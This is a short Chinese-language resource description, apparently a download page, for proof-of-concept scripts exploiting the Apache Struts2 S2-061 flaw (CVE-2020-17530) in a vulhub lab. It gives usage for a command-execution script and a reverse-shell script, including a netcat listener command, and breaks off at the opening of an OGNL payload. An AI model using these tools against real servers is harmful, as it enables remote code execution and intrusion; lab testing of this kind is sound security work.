-
S2-061的CVE-2020-17530payload,以及相应的简易PoCExp
资源介绍
S2-061
脚本皆根据vulhub的struts2-059/061漏洞测试环境来写的,不具普遍性,还望大佬多多指教
struts2-061-poc.py(可执行简单系统命令)
用法:python struts2-061-poc.py command
例子:python struts2-061-poc.py whoami
S2-061-shell.py(可反弹shell)
用法:
首先在一台机器A上监听指定端口(例如:nc -lvvp 7777)
执行脚本:python2 S2-061-shell.py target_url,其中target_url为漏洞环境地址,形式为
根据脚本提示输入A机器的IP及所监听的端口,即可在机器A的监听窗口获取到shell
以下是几个大佬搞出来的payload:
payload-1:(from ka1n4t)
%{(#instancemanager=#a